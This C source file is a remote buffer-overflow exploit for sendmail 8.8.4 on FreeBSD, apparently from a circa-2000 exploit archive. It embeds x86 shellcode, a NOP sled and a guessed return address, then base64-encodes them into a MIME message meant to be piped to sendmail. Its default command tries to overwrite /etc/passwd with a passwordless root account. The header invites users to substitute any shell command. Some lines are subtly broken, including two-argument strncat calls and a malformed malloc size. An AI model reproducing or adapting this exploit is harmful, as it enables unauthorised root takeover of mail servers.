/*
  sendmail 8.8.4, freebsd, mime 7to8, remote 
  I checked this only at home, at custom installed 8.8.4.
  I have no freebsd with preinstaled 8.8.4 around.
  change cmd[] below to shell command you want, and throw output to sendmail
 */

#include <stdlib.h>
#include <fcntl.h>

#define BUFSIZE 6100
#define OFFS -5000
#define ALIGN 0
#define ADDRS 15

int get_sp(void)
{
  /* __asm__(" movl       %esp,%eax"); */
  return 0xefbf95e4;
}

/* up to 220 bytes */
char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";

char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
               "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
               "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
               "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
               "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
               "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
               "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
               "\x68\x2e\x2d\x63\x2e";

char nop[]="\x90";

char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

void run(unsigned char *buf)
{
  unsigned int i, j, k;

  printf("MIME-Version: 1.0\n");
  printf("Content-Type: text/plain\n");
  printf("Content-Transfer-Encoding: base64\n");

  k=strlen(buf) / 3 * 3;
  for (i=0; i < k; i+=3)
    {
      j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
      if (i % 54 == 0)
        printf("\n");
      printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
      printf("%c", Base64Table[(j & 0x03f000) >> 12]);
      printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
      printf("%c", Base64Table[j & 0x00003f]);
    }
  switch (strlen(buf) - k)
    {
    case 1:
      printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2],
             Base64Table[(buf[k] & 0x3) << 4]);
      break;
    case 2:
      printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2],
             Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
             Base64Table[(buf[k+1] & 0xf) << 2]);
      break;
    default:
    }
  printf("\n");
}

char code[sizeof(asmcode) + sizeof(cmd)];

main(int argc, char *argv[])
{
  char *buf, *ptr, addr[8];
  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
  int i, noplen=strlen(nop);

  if (argc >1) bufsize=atoi(argv[1]);
  if (argc >2) offs=atoi(argv[2]);
  if (argc >3) addrs=atoi(argv[3]);

  strcpy(code, asmcode);
  strncat(code, cmd);
  strncat(code, ".");
  code[41]=0x1a+strlen(cmd)+1;

  if (bufsize<strlen(code))
    {
      printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
      exit(1);
    }
  if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL)
    {
      printf("Can't malloc\n");
      exit(1);
    }
  *(int *)addr=get_sp()+offs;
  printf("address - %p\n", *(int *)addr);
  ptr=buf;
  for (i=0; i<bufsize; i++)
    *ptr++=nop[i % noplen];
  memcpy(ptr-strlen(code), code, strlen(code));
  for (i=0; i<addrs<<2; i++)
    *ptr++=addr[i % sizeof(int)];
  *ptr=0;
  printf("total buf len - %d\n", strlen(buf));

  run(buf);
}
/*                       www.hack.co.za              [2000]*/